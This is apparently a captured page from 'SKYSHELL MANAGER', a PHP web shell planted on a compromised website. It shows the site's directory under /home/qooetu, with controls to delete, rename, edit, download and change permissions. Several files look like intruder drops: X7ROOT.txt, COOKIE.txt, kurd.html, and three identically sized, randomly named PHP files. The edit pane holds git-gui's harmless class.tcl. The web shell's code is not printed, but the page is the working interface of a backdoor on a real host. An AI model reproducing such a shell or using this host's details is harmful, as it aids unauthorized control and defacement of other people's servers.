📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: class.tcl
# git-gui simple class/object fake-alike # Copyright (C) 2007 Shawn Pearce proc class {class body} { if {[namespace exists $class]} { error "class $class already declared" } namespace eval $class " variable __nextid 0 variable __sealed 0 variable __field_list {} variable __field_array proc cb {name args} { upvar this this concat \[list ${class}::\$name \$this\] \$args } " namespace eval $class $body } proc field {name args} { set class [uplevel {namespace current}] variable ${class}::__sealed variable ${class}::__field_array switch [llength $args] { 0 { set new [list $name] } 1 { set new [list $name [lindex $args 0]] } default { error "wrong # args: field name value?" } } if {$__sealed} { error "class $class is sealed (cannot add new fields)" } if {[catch {set old $__field_array($name)}]} { variable ${class}::__field_list lappend __field_list $new set __field_array($name) 1 } else { error "field $name already declared" } } proc constructor {name params body} { set class [uplevel {namespace current}] set ${class}::__sealed 1 variable ${class}::__field_list set mbodyc {} append mbodyc {set this } $class append mbodyc {::__o[incr } $class {::__nextid]::__d} \; append mbodyc {create_this } $class \; append mbodyc {set __this [namespace qualifiers $this]} \; if {$__field_list ne {}} { append mbodyc {upvar #0} foreach n $__field_list { set n [lindex $n 0] append mbodyc { ${__this}::} $n { } $n regsub -all @$n\\M $body "\${__this}::$n" body } append mbodyc \; foreach n $__field_list { if {[llength $n] == 2} { append mbodyc \ {set } [lindex $n 0] { } [list [lindex $n 1]] \; } } } append mbodyc $body namespace eval $class [list proc $name $params $mbodyc] } proc method {name params body {deleted {}} {del_body {}}} { set class [uplevel {namespace current}] set ${class}::__sealed 1 variable ${class}::__field_list set params [linsert $params 0 this] set mbodyc {} append mbodyc {set __this [namespace qualifiers $this]} \; switch $deleted { {} {} ifdeleted { append mbodyc {if {![namespace exists $__this]} } append mbodyc \{ $del_body \; return \} \; } default { error "wrong # args: method name args body (ifdeleted body)?" } } set decl {} foreach n $__field_list { set n [lindex $n 0] if {[regexp -- $n\\M $body]} { if { [regexp -all -- $n\\M $body] == 1 && [regexp -all -- \\\$$n\\M $body] == 1 && [regexp -all -- \\\$$n\\( $body] == 0} { regsub -all \ \\\$$n\\M $body \ "\[set \${__this}::$n\]" body } else { append decl { ${__this}::} $n { } $n regsub -all @$n\\M $body "\${__this}::$n" body } } } if {$decl ne {}} { append mbodyc {upvar #0} $decl \; } append mbodyc $body namespace eval $class [list proc $name $params $mbodyc] } proc create_this {class} { upvar this this namespace eval [namespace qualifiers $this] [list proc \ [namespace tail $this] \ [list name args] \ "eval \[list ${class}::\$name $this\] \$args" \ ] } proc delete_this {{t {}}} { if {$t eq {}} { upvar this this set t $this } set t [namespace qualifiers $t] if {[namespace exists $t]} {namespace delete $t} } proc make_dialog {t w args} { upvar $t top $w pfx this this global use_ttk uplevel [linsert $args 0 make_toplevel $t $w] catch {wm attributes $top -type dialog} pave_toplevel $pfx } proc make_toplevel {t w args} { upvar $t top $w pfx this this if {[llength $args] % 2} { error "make_toplevel topvar winvar {options}" } set autodelete 1 foreach {name value} $args { switch -exact -- $name { -autodelete {set autodelete $value} default {error "unsupported option $name"} } } if {$::root_exists || [winfo ismapped .]} { regsub -all {::} $this {__} w set top .$w set pfx $top toplevel $top set ::root_exists 1 } else { set top . set pfx {} } if {$autodelete} { wm protocol $top WM_DELETE_WINDOW " [list delete_this $this] [list destroy $top] " } } ## auto_mkindex support for class/constructor/method ## auto_mkindex_parser::command class {name body} { variable parser variable contextStack set contextStack [linsert $contextStack 0 $name] $parser eval [list _%@namespace eval $name] $body set contextStack [lrange $contextStack 1 end] } auto_mkindex_parser::command constructor {name args} { variable index variable scriptFile append index [list set auto_index([fullname $name])] \ [format { [list source [file join $dir %s]]} \ [file split $scriptFile]] "\n" }
Save